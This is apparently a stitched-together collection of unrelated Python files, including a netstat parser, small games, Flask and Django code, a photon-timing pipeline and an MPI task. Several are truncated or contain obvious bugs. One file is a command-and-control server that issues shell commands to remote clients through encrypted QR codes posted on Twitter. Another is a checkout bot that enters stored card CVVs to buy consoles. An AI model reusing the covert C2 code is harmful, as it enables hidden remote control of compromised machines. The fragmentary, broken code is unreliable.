print "====> printing output to file named ==> " + output_file_name
output_f = open(output_file_name, "w")
output_f.write("Proto \"Local Address\" \" Foreign Address\" \" PID\" \"Image Name\" \n" +
"==============================================================================\n")
for line in network_list:
if "TCP" in line[0]:
pid = line[netstat_pid_col]
pid_cleansed = pid.replace("\r\n","")
line[netstat_pid_col] = pid_cleansed
try:
name = name_list[pid_cleansed]
line.append(name)
except:
line.append("unknown")
as_string = " ".join(line)
output_f.write(as_string)
output_f.write("\n")
print "======> finished! <====="
|
import turtle
t = turtle.Turtle()
t.speed(10)
t.circle(100)
t.circle(50)
|
#!/usr/bin/env python
# coding: utf-8
# run testModel1 from CosmoTransitions
from test import testModel1
m = testModel1.model1()
m.findAllTransitions()
|
#!/usr/bin/env python
# encoding: utf-8
import os
import sys
import re
class Models() :
def __init__(self,path,models) :
self.path = path
self.models = models
class Api() :
def __init__(self,root,api) :
self.root = root
self.api = api
def static_content(self,fapi,api) :
api = api+'.py'
OutputList = \
['#coding:utf-8\n\n\n',
' \'\'\' ' ,
' ********************************** \n\n ' ,
' ' ,
api ,
'\n\n',
' ********************************** ' ,
'\'\'\' ' ,
'\n\n\n' ,
'from flask import jsonify , g , request , current_app \n',
'from flask_login import current_user\n' ,
'from ..models import db \n' ,
'import json\n' ,
'import request\n'
]
fapi.writelines(OutputList)
def get_blueprint(self) :
root = self.root
api = self.api
for each in root :
os.chdir(root)
init = open("__init__.py","r")
lines = init.readlines()
for index , line in enumerate(lines) :
if "Blueprint" in line :
temp = lines[index+1]
blue = ''
flag = 0
for j , i in enumerate(temp) :
if temp[j] == '\'' and flag != 0 :
break
if flag == 1 :
blue += i
if i == '\'' :
flag += 1
self.blue = blue
def import_models(self,models,fapi) :
model = (' , ').join(models.models)
Output = ["from ..models import " + model+"\n" ]
fapi.writelines(Output)
def import_blueprint(self,fapi) :
Output = ["from . import " + self.blue +"\n\n\n\n\n\n"]
fapi.writelines(Output)
def to_get(self,fapi) :
Output = ['@'+self.blue+'.route(\' \', methods=[\'GET\']) \n' ,
'def \n ' ,
' \'\'\'\n description of function\n \'\'\'\n ' ,
'\n\n' ,
' return jsonify ({ \n\n }) ' ,
', \n\n\n\n' ,
]
fapi.writelines(Output)
def to_post(self,fapi) :
Output = ['@'+self.blue+'.route(\' \', methods=[\'POST\']) \n' ,
'def \n ' ,
' \'\'\'\n description of function\n \'\'\'\n ' ,
'\n\n' ,
' db.session.add() \n' ,
' db.session.commit() \n',
' return jsonify ({ \n\n }) ' ,
', \n\n\n\n' ,
]
fapi.writelines(Output)
def to_put(self,fapi) :
Output = ['@'+self.blue+'.route(\' \', methods=[\'PUT\']) \n' ,
'def \n ' ,
' \'\'\'\n description of function\n \'\'\'\n ' ,
'\n\n' ,
' db.session.add() \n' ,
' db.session.commit() \n',
' return jsonify ({ \n\n }) ' ,
', \n\n\n\n' ,
]
fapi.writelines(Output)
def to_delete(self,fapi) :
Output = ['@'+self.blue+'.route(\' \', methods=[\'DELETE\']) \n' ,
'def \n ' ,
' \'\'\'\n description of function\n \'\'\'\n ' ,
'\n\n' ,
' db.session.delete() \n' ,
' db.session.commit() \n',
' return jsonify ({ \n\n }) ' ,
', \n\n\n\n' ,
]
fapi.writelines(Output)
def generate_api(self,models) :
root = self.root
api = self.api
print root
for each in root :
os.chdir(root)
for item in api :
if not os.path.isfile(item+".py") :
fapi = open(item+".py","w+")
self.static_content(fapi,item)
self.import_models(models,fapi)
self.import_blueprint(fapi)
self.to_get(fapi)
self.to_get(fapi)
self.to_post(fapi)
self.to_post(fapi)
self.to_put(fapi)
self.to_delete(fapi)
fapi.close()
def find_init() :
API = []
for root , dirs , files in os.walk(".") :
for each in files :
if each == '__init__.py' :
init = open(root+"/"+each,'r')
lines = init.readlines()
for index , line in enumerate(lines) :
if "from" in line and "." in line and "import" in line :
if '\\' in line :
flag = 1
_api = re.split(",",line)
first = _api[0].split()[-1]
api_ = _api[1:]
api_ = api_[:-1]
api_.append(first)
if flag == 1 :
next_ = lines[index+1][:-1]
more = re.split(",",next_)
api_.extend(more)
flag = 0
api = []
for a in api_ :
a = a.replace(' ','')
api.append(a)
api = list(set(api))
path = os.getcwd() + root[1:]
item = Api(path,api)
API.append(item)
init.close()
if len(API) == 0 :
print "Can not find __int__.py"
sys.exit(0)
return API
def find_models() :
models = []
path = '1'
for root , dirs , files in os.walk(".") :
for each in files :
if each == 'models.py' :
path = root
init = open(root+"/"+each,'r')
lines = init.readlines()
for line in lines :
if line[:5] == 'class' :
item = ''
for i in line[6:] :
flag = 0
if i != ' ' :
flag = 1
if i == "(" or i == ':' :
break
if flag == 1:
item += i
models.append(item)
Model = Models(path,models)
return Model
if __name__ == '__main__' :
api = find_init()
model = find_models()
for each in api :
each.get_blueprint()
each.generate_api(model)
|
#!/usr/bin/env python
# encoding: utf-8
import os
from flask import Flask , request , url_for , send_from_directory
from werkzeug import secure
|
import random
lives = 9
words = ['shirt', 'human', 'fairy', 'teeth', 'otter', 'plane', 'eight', 'pizza', 'lives']
secret_word = random.choice(words)
clue = list('?????')
heart_symbol = u'\u2764'
guessed_word_correctly = False
def update_clue(guessed_letter, secret_word, clue):
index = 0
for char in secret_word:
if guessed_letter == char:
clue[index] = char
index += 1
while lives > 0:
print(clue)
print('Lives left: ' + heart_symbol * lives)
guess = input('Guess a letter or the whole word: ')
if guess == secret_word:
guessed_word_correctly = True
break
if guess in secret_word:
update_clue(guess, secret_word, clue)
else:
print('Incorrect. You lost a life.')
lives -= 1
if guessed_word_correctly:
print('You won! The secret word was ' + secret_word)
else:
print('You lost! The secret word was ' + secret_word)
|
import pygame
from pygame.sprite import Sprite
class Mine(Sprite):
def __init__(self, ai_settings, screen, ship):
super().__init__()
self.screen = screen
self.image = pygame.image.load('images/mine.png')
self.rect = self.image.get_rect()
self.rect.centerx = ship.rect.centerx
self.rect.centery = ship.rect.centery
def blitme(self):
self.screen.blit(self.image, self.rect)
|
from mongoengine import *
from datetime import datetime
from db import config
connect(config._MongoengineConnect)
class Item(EmbeddedDocument):
'''
流: 视频流,音乐流 句子的集合
'''
# belongsto_user = ReferenceField((Users), required=True,dbref=True)#,dbref=True
meta = {'allow_inheritance': True}
sentence_jp = StringField(required=True)
Nx = StringField()
tags = ListField(StringField(max_length=20))
def __str__(self):
return self.sentence_jp
class SubFlow(Document):
meta = {'allow_inheritance': True}
name = StringField()
items = EmbeddedDocumentListField(Item)
date = DateTimeField(default=datetime.now, required=True) #datetime.utcnow datetime.now()
# s = Sentences(sentence_jp = 'dsads')
# s.save()
# print(s)
###############################################################################
# solve func
class Solve():
def __init__(self,sentence):
self.sentence = sentence
def delete(self):
# 删除Sentences里的句子文档
self.sentence.delete()
def update(self,db_word):
# 更新句子文档
self.sentence.words_list.append({
'word_db': db_word,
'word_mecab': db_word.mecab,
})
self.sentence.save()
|
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Amazon :
def __init__(self):
webOptions = webdriver.ChromeOptions()
webOptions.add_argument("start-maximized")
webOptions.add_argument("disable-infobars")
self.driver = webdriver.Chrome(executable_path=r"/pathtothechromedriver",options=options)
def login(self,url,email,password):
self.driver.get(url)
login_email = self.driver.find_element_by_xpath("//input[@id='ap_email']")
login_email.send_keys(email)
cont = self.driver.find_element_by_xpath("//input[@id='continue']")
cont.click()
login_password = self.driver.find_element_by_xpath("//input[@id='ap_password']")
login_password.send_keys(password)
signin = self.driver.find_element_by_xpath("//input[@id='signInSubmit']")
signin.click()
def buy_now(self,url):
time.sleep(1)
self.driver.get(url)
buyNow = false
while not buyNow:
try:
buyNowButton = self.driver.find_element_by_xpath("//input[@id='buy-now-button']")
buyNowButton.click()
buyNow = True
except:
self.driver.refresh()
time.sleep(1)
def completePayment(self,cvv):
paymentMode = self.driver.find_element_by_xpath("//input[@type='radio']/../../../../following-sibling::div//span[(.)='ending in 2444']")
paymentMode.click()
cvvEntry = self.driver,find_element_by_xpath("//input[@type='radio']/../../../../following-sibling::div//span[(.)='ending in 2444']/../../../../../../../following-sibling::div//input[@type='password']")
cvvEntry.send_keys(cvv)
continueButton = self.driver.find_element_by_xpath("(//div/span/span/input[@type='submit'])[2]")
continueButton.click()
time.sleep(3)
placeOrder = self.driver.find_element_by_xpath("//span[@id='placeYourOrder']/span/input[@title='Place Your Order and Pay' and @type='submit']")
placeOrder.click()
#need to add notifications to the user somehow
if __name__=="__main__":
autoBuyBot = Amazon()
email = ""
password = ""
cvv = ""
autoBuyBot.login("https://www.amazon.in/gp/sign-in.html",email,password)
autoBuyBot.buy_now("https://www.amazon.in/Sony-CFI-1008B01R-PlayStation-Digital-Edition/dp/B08FVRQ7BZ")
#use this for disc edition : https://www.amazon.in/Sony-CFI-1008A01R-PlayStation-5-console/dp/B08FV5GC28
#use this for bundle1 : https://www.amazon.in/PS5TM-Digital-DualSenseTM-charging-station/dp/B08NTVHTPT
autoBuyBot.completePayment(cvv)
|
import time
import tweepy
import os
import zlib
import qrcode
from pyzbar.pyzbar import decode
from PIL import Image
import base64
from encryption import AESCipher, load_keys
import pickle
import json
import subprocess
import requests
from io import BytesIO
from api_keys import api_keys
import sys
from sqlalchemy import orm
from sqlalchemy.ext.declarative import declarative_base
import sqlalchemy as sa
import uuid
from colored import fg, attr
reset = attr('reset')
base = declarative_base()
engine = sa.create_engine('sqlite:///clients.db')
base.metadata.bind = engine
session = orm.scoped_session(orm.sessionmaker())(bind=engine)
# we using QRs cause twitter character limit banter
# models for clients
class Client(base):
__tablename__ = 'clients' #<- must declare name for db table
idx = sa.Column(sa.Integer,primary_key=True)
client_id = sa.Column(sa.String(255),nullable=False)
init_wrkdir = sa.Column(sa.String(512),nullable=False)
def __repr__(self):
return f"{self.client_id}"
# create listener
class ServerListener(tweepy.StreamListener):
def __init__(self, api, cipher_key, session, current_client):
self.api = api
self.cipher = AESCipher(cipher_key)
self.sess = session
self.client_ids = [i.client_id for i in self.sess.query(Client).all()]
self.server_id = uuid.uuid4().hex
self.current_client = current_client
self.command_to_send = ''
assert self.server_id not in self.client_ids
if not self.current_client:
print(f"{fg('yellow')} No clients found, listening...")
else:
print(fg('red'))
print(f'Successfully connected to {self.current_client}!')
self.command_to_send = input(self.sess.query(Client).filter(Client.client_id == self.current_client).all()[0].init_wrkdir)
self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
def on_data(self, raw_data):
# process raw stream data, read qr, pipe message
if 'delete' in raw_data:
pass
elif 'limit' in raw_data:
pass
else:
self.process_raw(raw_data)
return True
def process_raw(self, raw_data):
# do stuff here, raw_data is a string
data = json.loads(raw_data)
tweet = self.read_message(data)
client_id = self._get_client_id(tweet)
# is it a new connection?
if self._tweet_type(tweet) == 'connection_confirm' and client_id not in self.client_ids and client_id!=self.server_id:
# add new client
self.sess.add(Client(client_id = client_id, init_wrkdir=self._get_response_message(tweet)))
self.sess.commit()
print(fg('green')+'New client connected!', client_id + fg('red'))
connect_to_new = input(fg('yellow')+'Connect to new client? ' + client_id + '(Y/N)')
if connect_to_new in ['y','Y']:
print(fg('red'))
self.current_client = client_id
self.command_to_send = input(self._get_response_message(tweet))
# send command and wait for response
self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
# is it a client response?
if client_id == self.current_client and self._tweet_type(tweet) == 'command_response' and client_id!=self.server_id:
# this is a response!
print('this is a response!')
response = self._get_response_message(tweet)
print(response+ '\n')
self.command_to_send = input(self._get_response_message(tweet))
# send command and wait for response
self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
def on_error(self, status_code):
if status_code == 420:
return False
#-------------------------------------------------------Private subs-------------------------------------------------------#
def _tweet_type(self, tweet):
if tweet.split('::::'):
return tweet.split('::::')[-1]
return 'empty'
def _get_client_id(self, tweet):
if tweet.split('::::'):
return tweet.split('::::')[0]
return 'empty'
def _get_response_message(self, tweet):
if tweet.split('::::'):
return tweet.split('::::')[1]
return 'empty'
def _connect_different(self):
choice = input(reset + 'Would you like to connect to someone else or quit? (connect/quit)')
if choice in ['connect', 'c', 'con']:
possible_clients = session.query(Client).all()
if possible_clients:
print('Available clients: ', fg('yellow'))
for client in possible_clients:
print(client)
wanted_client = input('Please select a client to connect to: ')
print(f'Connecting to {wanted_client}...')
self.current_client = wanted_client
self.command_to_send = input(self.sess.query(Client).filter(Client.client_id == self.current_client).all()[0].init_wrkdir)
self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
else:
print(f"{fg('yellow')} No clients found, listening...")
else:
sys.exit(reset+"Goodbye!")
#-------------------------------------------------------Public subs-------------------------------------------------------#
def generate_qr(self, message):
# encode to base_64 and generate_qr
message = self.cipher.encrypt(message)
message = base64.b64encode(message.encode('utf-8'))
qr = qrcode.make(message)
return qr
def read_qr(self, img):
message = decode(img)[0].data.decode()
message = base64.b64decode(message).decode('utf-8')
return self.cipher.decrypt(message)
def post_command(self, message):
if self.command_to_send == 'exit ShAfT':
self._connect_different()
else:
qr = self.generate_qr(message)
qr.save('command_to_send.jpg')
# post to twitter
self.api.update_with_media('command_to_send.jpg')
os.remove('command_to_send.jpg')
return True
def read_message(self, tweet_data):
if 'media' in tweet_data['entities']:
if 'media_url_https' in tweet_data['entities']['media'][0]:
# get image
response = requests.get(tweet_data['entities']['media'][0]['media_url_https'])
img = Image.open(BytesIO(response.content))
message = self.read_qr(img)
return message
else:
return tweet_data['text']
# create stream
class ShellStream():
def __init__(self, auth, listener):
self.stream = tweepy.Stream(auth=auth, listener=listener)
def start(self, user_id):
self.stream.filter(follow = [user_id])
if __name__ == '__main__':
_, aeskey = load_keys()
base.metadata.create_all()
possible_clients = session.query(Client).all()
auth = tweepy.OAuthHandler(api_keys['consumer_key'], api_keys['consumer_secret'])
auth.set_access_token(api_keys['access_token'], api_keys['access_token_secret'])
api = tweepy.API(auth)
if possible_clients:
print('Available clients: ', fg('yellow'))
for client in possible_clients:
print(client)
wanted_client = input('Please select a client to connect to: ')
print(f'Connecting to {wanted_client}...')
stream = ShellStream(auth = auth, listener=ServerListener(api, aeskey, session, wanted_client))
else:
stream = ShellStream(auth = auth, listener=ServerListener(api, aeskey, session, None))
stream.start(api_keys['my_user_id'])
|
import cv2
import numpy as np
img1 = cv2.imread('Groundtruthhere') ##replace with Original image here
img2 = cv2.imread('Sketchlocationhere') ## replace with the sketch here
vis = np.concatenate((img1, img2), axis=1)
cv2.imwrite('out.jpg', vis) ##mention the directory where you want the concatenated image to be saved
|
#!/bin/python
import sys
n = int(raw_input().strip())
arr = map(int,raw_input().strip().split(' '))
negativeNumber = 0
positiveNumber = 0
zero = 0
for i in arr:
if i < 0:
negativeNumber+=1
elif i > 0:
positiveNumber+=1
else:
zero+=1
print format(positiveNumber/float(len(arr)),'.6f')
print format(negativeNumber/float(len(arr)),'.6f')
print format(zero/float(len(arr)),'.6f')
|
import logging
import numpy as np
import pandas as pd
import warnings
from numba import jit, uint64
from typing import Tuple, List
import attr
from attr.validators import instance_of
from itertools import chain
@attr.s
class TagPipeline:
"""
Pipeline to interpolate TAG lens pulses
:param pd.DataFrame photons: DataFrame of photons in experiment
:param pd.Series tag_pulses: Series of TAG events
:param float freq: Expected frequency of TAG sync pulses in Hz
:param float binwidth: Multiscaler binwidth in seconds (100 ps == 100e-12)
:param int num_of_pulses: Number of TAG pulses from the driver per period. Currently NotImplemented
:param bool to_phase: Whether to compensate for the sinusoidal pattern of the TAG. Leave True
:param int offset: Offset in degrees given from the TAG driver for each pulse
"""
photons = attr.ib(validator=instance_of(pd.DataFrame))
tag_pulses = attr.ib(validator=instance_of(pd.Series))
freq = attr.ib(default=189e3, validator=instance_of(float)) # Hz
binwidth = attr.ib(
default=800e-12, validator=instance_of(float)
) # Multiscaler binwidth
num_of_pulses = attr.ib(
default=1, validator=instance_of(int)
) # Number of pulses per TAG period
to_phase = attr.ib(
default=True, validator=instance_of(bool)
) # compensate the sinusoidial pattern of TAG
offset = attr.ib(
default=0, validator=instance_of(int)
) # offset the TAG phase [degrees]
finished_pipe = attr.ib(init=False)
@property
def first_photon(self):
return self.photons.abs_time.min().astype(np.uint64)
@property
def last_photon(self):
return self.photons.abs_time.max().astype(np.uint64)
def run(self):
""" Main pipeline """
clean_tag = self.__preserve_relevant_tag_pulses().reset_index(drop=True)
verifier = TagPeriodVerifier(
tag=clean_tag,
freq=self.freq / self.num_of_pulses,
binwidth=self.binwidth,
first_photon=np.int64(self.first_photon),
last_photon=self.last_photon,
)
verifier.verify()
if verifier.success:
phaser = TagPhaseAllocator(
photons=self.photons,
tag=verifier.tag,
pulses_per_period=self.num_of_pulses,
to_phase=self.to_phase,
offset=self.offset,
)
phaser.allocate_phase()
self.photons = phaser.photons
self.finished_pipe = True
else:
self.finished_pipe = False
try: # Add the 'TAG' column to check data after pipeline finishes
self.photons["TAG"] = np.pad(
clean_tag,
(self.photons.shape[0] - len(self.tag_pulses), 0),
"constant",
)
except ValueError: # more TAG pulses than events
self.photons["TAG"] = self.tag_pulses[: self.photons.shape[0]]
def __preserve_relevant_tag_pulses(self):
""" Keep only TAG pulses that are in the timeframe of the experiment """
relevant_tag_pulses = (self.tag_pulses >= self.first_photon) & (
self.tag_pulses <= self.last_photon
)
return self.tag_pulses.loc[relevant_tag_pulses]
@attr.s
class TagPeriodVerifier:
""" Verify input to the TAG pipeline, and add missing pulses accordingly """
tag = attr.ib(validator=instance_of(pd.Series))
last_photon = attr.ib(validator=instance_of(np.uint64))
freq = attr.ib(default=189e3, validator=instance_of(float))
binwidth = attr.ib(default=800e-12, validator=instance_of(float))
jitter = attr.ib(
default=0.05, validator=instance_of(float)
) # Allowed jitter of signal, between 0 - 1
first_photon = attr.ib(default=np.int64(0), validator=instance_of(np.int64))
allowed_corruption = attr.ib(default=0.3, validator=instance_of(float))
success = attr.ib(init=False)
@property
def period(self):
return int(np.ceil(1 / (self.freq * self.binwidth)))
@property
def allowed_noise(self):
return int(np.ceil(self.jitter * self.period))
def verify(self):
""" Main script to verify and correct the recorded TAG lens pulses """
# Find the borders of the disordered periods
start_idx, end_idx = self.__obtain_start_end_idx()
# Add \ remove TAG pulses in each period
if isinstance(start_idx, np.ndarray) and isinstance(end_idx, np.ndarray):
self.__fix_tag_pulses(start_idx, end_idx)
self.__add_last_event_manually()
self.success = True
else:
self.success = False
def __obtain_start_end_idx(self) -> Tuple[np.ndarray, np.ndarray]:
""" Create two vectors corresponding to the starts and ends of the 'wrong' periods of the TAG lens """
diffs = self.tag.diff()
diffs[0] = self.period
logging.debug(
"The mean frequency of TAG events is {:0.2f} Hz.".format(
1 / (np.mean(diffs) * self.binwidth)
)
)
delta = np.abs(diffs - self.period)
diffs[delta < self.allowed_noise] = 0 # regular events
diffs[diffs != 0] = 1
if np.sum(diffs) / len(diffs) > self.allowed_corruption:
logging.warning(
f"Over {self.allowed_corruption * 100}% of TAG pulses were out-of-phase."
" Stopping TAG interpolation."
)
return (-1, -1)
diff_of_diffs = diffs.diff() # a vec containing 1 at the start
# of a "bad" period, and -1 at its end
diff_of_diffs[0] = 0
starts_and_stops = diff_of_diffs[diff_of_diffs != 0]
start_idx = starts_and_stops[starts_and_stops == 1].index - 1
end_idx = starts_and_stops[starts_and_stops == -1].index - 1
return start_idx.values, end_idx.values
def __fix_tag_pulses(self, starts: np.ndarray, ends: np.ndarray):
""" Iterate over the disordered periods and add or remove pulses """
if len(starts) == 0: # Nothing fix
return
period = self.period
items_to_discard = []
start_iter_at = 0
# If start contains a 0 - manually add TAG pulses
if starts[0] == 0:
start_iter_at = 1
new_ser = pd.Series(
np.arange(
start=self.tag[ends[0]] - period,
stop=self.first_photon - 1,
step=-period,
dtype=np.uint64,
),
dtype=np.uint64,
)
self.tag = self.tag.append(new_ser, ignore_index=True).astype(np.uint64)
items_to_discard.append(np.arange(starts[0], ends[0]))
jitter = self.jitter
new_data, returned_items_to_discard = numba_iterate_over_disordered(
tag=self.tag.values,
starts=starts[start_iter_at:],
ends=ends[start_iter_at:],
period=period,
jitter=jitter,
)
flattened_items_to_discard = list(
chain.from_iterable(items_to_discard + returned_items_to_discard)
)
self.tag.drop(flattened_items_to_discard, inplace=True)
flattened_new_data = list(chain.from_iterable(new_data))
self.tag = (
self.tag.append(
pd.Series(flattened_new_data, dtype=np.uint64), ignore_index=True
)
.sort_values()
.reset_index(drop=True)
)
assert self.tag.dtype == np.uint64
def __add_last_event_manually(self):
""" Insert a 'fake' TAG event to encapsulate the last remaining photons """
last_tag_val = self.tag.values[-1] + self.period
self.tag = self.tag.append(
pd.Series(last_tag_val, dtype=np.uint64), ignore_index=True
)
assert self.tag.dtype == np.uint64
@attr.s
class TagPhaseAllocator:
""" Assign a phase to each photon """
photons = attr.ib(validator=instance_of(pd.DataFrame))
tag = attr.ib(validator=instance_of(pd.Series))
pulses_per_period = attr.ib(default=1, validator=instance_of(int))
to_phase = attr.ib(default=True, validator=instance_of(bool))
offset = attr.ib(default=0, validator=instance_of(int))
TAG_DRIVER_OFFSET = attr.ib(default=90, validator=instance_of(int))
@property
def offset_rad(self):
""" Convert degrees to radians """
return (self.offset + self.TAG_DRIVER_OFFSET) * np.pi / 180
def allocate_phase(self):
""" Using Numba functions allocate the proper phase to the photons """
bin_idx, relevant_bins = numba_digitize(
self.photons.abs_time.values, self.tag.values
)
relevant_bins[bin_idx >= len(self.tag)] = False
photons = self.photons.abs_time.values.astype(float)
photons[np.logical_not(relevant_bins)] = np.nan
relevant_photons = np.compress(relevant_bins, photons)
phase_vec = numba_find_phase(
photons=relevant_photons,
bins=np.compress(relevant_bins, bin_idx),
raw_tag=self.tag.values,
to_phase=self.to_phase,
offset=self.offset_rad,
)
if not self.to_phase:
phase_vec = phase_vec.astype(np.uint16)
first_relevant_photon_idx = photons.shape[0] - relevant_photons.shape[0]
photons[first_relevant_photon_idx:] = phase_vec
self.photons["Phase"] = photons
self.photons.dropna(how="any", inplace=True)
assert self.photons["Phase"].any() >= -1
assert self.photons["Phase"].any() <= 1
@jit(nopython=True, cache=True)
def numba_digitize(values: np.array, bins: np.array) -> np.array:
""" Numba'd version of np.digitize. """
bins = np.digitize(values, bins)
relevant_bins = bins > 0
return bins, relevant_bins
@jit(nopython=True, cache=True)
def numba_find_phase(
photons: np.array, bins: np.array, raw_tag: np.array, to_phase: bool, offset: float
) -> np.array:
"""
Find the phase [0, 2pi) of the photon for each event in `photons`.
:return np.ndarray: Array with the size of photons containing the phases.
"""
phase_vec = np.zeros_like(photons, dtype=np.float32)
tag_diff = np.diff(raw_tag)
for idx, cur_bin in enumerate(bins): # values of indices that changed
phase_vec[idx] = (photons[idx] - raw_tag[cur_bin - 1]) / tag_diff[cur_bin - 1]
if to_phase:
phase_vec_float = np.sin(phase_vec * 2 * np.pi + offset)
return phase_vec_float.astype(np.float32)
return phase_vec.astype(np.float32)
@jit(cache=True)
def numba_iterate_over_disordered(
tag: np.ndarray, starts: np.ndarray, ends: np.ndarray, period: int, jitter: float
) -> Tuple[List, List]:
"""
Numba'd version of the main TAG iteration.
Currently not working in nopython due to some bugs with arange
"""
new_data = []
items_to_discard = []
jitter_int = period * jitter
row_idx = 1
for start_idx, end_idx in zip(starts, ends):
start_val = tag[start_idx]
end_val = tag[end_idx]
if np.abs(end_val - start_val) - period > jitter_int:
l = np.arange(end_val - period, start_val, -period, np.uint64)
new_data.append(l)
items_to_discard.append(np.arange(start_idx + 1, end_idx))
row_idx += 1
return (new_data, items_to_discard)
|
#One Away
import math
s1 = input().strip()
s2 = input().strip()
def checkEdit(s1 , s2):
if math.abs(len(s1) - len(s2)) > 1:
return False
long = s1 if len(s1) > len(s2) else s2
short = s1 if len(s1) < len(s2) else s2
idx1 = 0
idx2 = 0
found = 0
while idx1 < len(long) and idx2 < len(short):
if long[idx1] != short[idx2]:
if found:
return False
found = 1
#if
print(checkEdit(s1 , s2))
|
from django.shortcuts import render,redirect
from django.template import RequestContext
from .models import Chef_departement, Etudiant, Matiere, Professeur
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required(login_url='login')
def deptGit(request):
form=Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
context ={ 'forms' : form}
return render(request,'departements/git/git.html', context)
@login_required(login_url='login')
def deptGitEns(request):
items =Professeur.objects.filter(departemet__nom_departement='Génie informatique et telecoms')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/git/enseingnant.html',context)
@login_required(login_url='login')
def deptGitMat(request):
itemss = Matiere.objects.filter(departemet__nom_departement='Génie informatique et telecoms')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
context ={ 'items':itemss ,'forms' : form}
return render(request,'departements/git/matiere.html',context)
@login_required(login_url='login')
def deptETDIC1(request):
items = Etudiant.objects.filter(departement__nom_departement='Génie informatique et telecoms').filter(classe__nom_classe='DIC1')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/git/DIC1.html',context)
@login_required(login_url='login')
def deptETDIC2(request):
items = Etudiant.objects.filter(departement__nom_departement='Génie informatique et telecoms').filter(classe__nom_classe='DIC2')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/git/DIC2.html',context)
@login_required(login_url='login')
def deptETDIC3(request):
items = Etudiant.objects.filter(departement__nom_departement='Génie informatique et telecoms').filter(classe__nom_classe='DIC3')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/git/DIC3.html',context)
@login_required(login_url='login')
def deptCivil(request):
form=Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
context ={ 'forms' : form}
return render(request,'departements/civil/civil.html', context)
@login_required(login_url='login')
def deptCivilEns(request):
items =Professeur.objects.filter(departemet__nom_departement='Génie civil')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/civil/enseingnant.html',context)
@login_required(login_url='login')
def deptCivilMat(request):
itemss = Matiere.objects.filter(departemet__nom_departement='Génie civil')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
context ={ 'items':itemss ,'forms' : form}
return render(request,'departements/civil/matiere.html',context)
@login_required(login_url='login')
def deptCETDIC1(request):
items = Etudiant.objects.filter(departement__nom_departement='Génie civil').filter(classe__nom_classe='DIC1')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/civil/DIC1.html',context)
@login_required(login_url='login')
def deptCETDIC2(request):
items = Etudiant.objects.filter(departement__nom_departement='Génie civil').filter(classe__nom_classe='DIC2')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/civil/DIC2.html',context)
@login_required(login_url='login')
def deptCETDIC3(request):
items = Etudiant.objects.filter(departement__nom_departement='Génie civil').filter(classe__nom_classe='DIC3')
form=Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
context ={ 'items':items ,'forms' : form}
return render(request,'departements/civil/DIC3.html',context)
# def eleve(request):
# items = EleveIngenieur.objects.all()
# # if request.method=='POST':
# # form = EleveForm(request.POST)
# # if form.is_valid():
# # form.save()
# # return redirect('login')
# # else :
# # form =EleveForm()
# context ={
# 'items':items,
# # 'form':form,
# }
# return render(request,'departements/git.html',context)
|
#!/usr/bin.python
# -*- coding: utf-8 -*-
import os, sys, inspect
pfolder = os.path.realpath(os.path.abspath (os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"..")))
if pfolder not in sys.path:
sys.path.insert(0, pfolder)
reload(sys)
sys.setdefaultencoding('utf8')
from ConfigParser import SafeConfigParser
from luigi import six
import luigi
import luigi.contrib.hadoop
import luigi.contrib.hdfs
import luigi.contrib.ssh
import socket
from prepare.get_train_data import Training2LDA
from tools.mysql.import_model_view import import_model_view
from tools.view_model import plda_model_view
class PLDA(luigi.Task):
conf = luigi.Parameter()
def __init__(self, *args, **kwargs):
luigi.Task.__init__(self, *args, **kwargs)
parser = SafeConfigParser()
parser.read(self.conf)
root = parser.get("basic", "root")
self.ssh_user = parser.get("basic", "ssh_user")
self.ssh_port = parser.get('basic', 'ssh_port')
self.topic_num = parser.getint('plda+', 'topic_num')
self.burn_in_iter = parser.getint('plda+', 'plda_burn_in_iter')
self.total_iter = parser.getint('plda+', 'plda_total_iter')
self.cpu_core_num = parser.getint('plda+', 'cpu_core_num')
self.alpha = 50.0 / self.topic_num
self.mf = '%s/data/temp/mf' % root
self.mpi_plda = '%s/plda/mpi_lda' % root
self.plda_model = '%s/data/train/plda.model.txt' % root
self.plda_model_tmp = self.plda_model + ".tmp"
def requires(self):
return [Training2LDA(self.conf)]
def output(self):
return luigi.LocalTarget(self.plda_model)
def run(self):
mpi_nodes = [node.strip() for node in os.popen('mpdtrace').readlines()]
if len(mpi_nodes) == 0:
return
job_num = len(mpi_nodes) * self.cpu_core_num
with open(self.mf, 'w') as mf_fd:
for node in mpi_nodes:
print >> mf_fd, "%s:%d" % (node, self.cpu_core_num)
localhostname = socket.gethostname()
localhostname_ = '.'.join(localhostname.split('.')[0:-1])
for node in mpi_nodes:
if node != localhostname and node != localhostname_:
rfs = luigi.contrib.ssh.RemoteFileSystem(node, port=self.ssh_port, username=self.ssh_user)
print "sending %s to %s" % (self.input()[0].fn, node)
rfs.put(self.input()[0].fn, self.input()[0].fn)
cmd = '''
mpiexec -machinefile %s -n %d \
%s \
--num_topics %d --alpha %f --beta 0.01 \
--training_data_file %s \
--model_file %s \
--total_iterations %d
'''
